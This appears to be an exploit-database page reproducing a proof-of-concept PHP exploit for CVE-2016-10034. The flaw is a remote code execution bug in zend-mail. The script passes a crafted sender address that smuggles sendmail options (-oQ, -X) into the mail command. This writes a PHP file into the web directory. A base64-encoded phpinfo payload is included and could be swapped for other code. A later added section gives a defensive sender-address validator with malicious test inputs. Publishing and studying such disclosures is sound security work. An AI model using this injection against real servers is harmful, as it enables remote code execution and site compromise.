Zend Framework / zend-mail < 2.4.11 Remote Code Execution Exploit

2016.12.31
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php
/*
Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11
zend-mail < 2.7.2

Discovered/Coded by:
Dawid Golunski
https://legalhackers.com

Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html

Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html

Follow the feed for updates:
https://twitter.com/dawid_golunski

A simple PoC (working on Sendmail MTA)

It will inject the following parameters to sendmail command:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]

which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:

09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<

See the full advisory URL for the exploit details.
*/

// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field

$email_from = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';

// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");

// ------------------
// mail() param injection via the vulnerability in zend-mail

chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
Zend\Loader\AutoloaderFactory::factory(array(
    'Zend\Loader\StandardAutoloader' => array(
        'autoregister_zf' => true
    )
));
Zend\Mvc\Application::init(require 'config/application.php')->run();

$message = new Zend\Mail\Message();
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');

$transport = new Zend\Mail\Transport\Sendmail();
$transport->send($message);
?>
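The PoC works because the sender address is handed to sendmail unescaped, so the spaces inside the From value split into extra argv tokens. The following is an added defensive example, not code from the advisory or from zend-mail: an application-side check (the function name isSafeSenderAddress and the sample inputs are constructed here) that rejects any user-supplied sender that could split into more than one argument or be parsed as a sendmail option, which is the input-validation layer a contact form should apply before any mail library sees the value.

```php
<?php
// Added defensive example (not part of the advisory or zend-mail):
// validate a user-supplied sender address before it can reach a mail
// transport that forwards it to sendmail. The PoC above works because
// the quoted local part carries spaces, and each space-separated token
// becomes a separate sendmail argument (-oQ, -X ...).

/**
 * Return true only for a plain addr-spec that cannot be split into
 * extra argv tokens or be mistaken for an option by sendmail.
 */
function isSafeSenderAddress(string $addr): bool
{
    // Reject anything that would produce more than one argv token or
    // alter the command line: whitespace, quotes, shell metacharacters,
    // control bytes (newline also enables mail header injection).
    if (preg_match('/[\s"\'`$\\\\;&|<>()\x00-\x1f\x7f]/', $addr)) {
        return false;
    }
    // A leading '-' would be parsed by sendmail as an option.
    if ($addr === '' || $addr[0] === '-') {
        return false;
    }
    // Allow only a conservative dot-atom local part and a dotted domain;
    // deliberately stricter than RFC 5322 (no quoted local parts).
    if (!preg_match('/^[A-Za-z0-9.!#%+_=-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/', $addr)) {
        return false;
    }
    return filter_var($addr, FILTER_VALIDATE_EMAIL) !== false;
}

// Constructed inputs: the advisory's injected sender, two other
// malicious shapes, and a benign address that must still be accepted.
$samples = [
    '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com' => false,
    '-oQ/tmp/@email.com'                                          => false,
    "user@example.com\nBcc: victim@example.com"                   => false,
    'user.name+tag@example.com'                                   => true,
];

foreach ($samples as $addr => $expected) {
    $ok = isSafeSenderAddress($addr);
    printf("%-64s => %s\n", json_encode($addr), $ok ? 'accepted' : 'rejected');
    assert($ok === $expected);
}
```

Such a check complements, rather than replaces, upgrading to zend-mail 2.4.11 / 2.7.2, since the transport itself remains the place where the argument is escaped.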

References:

https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html



Copyright 2017, cxsecurity.com
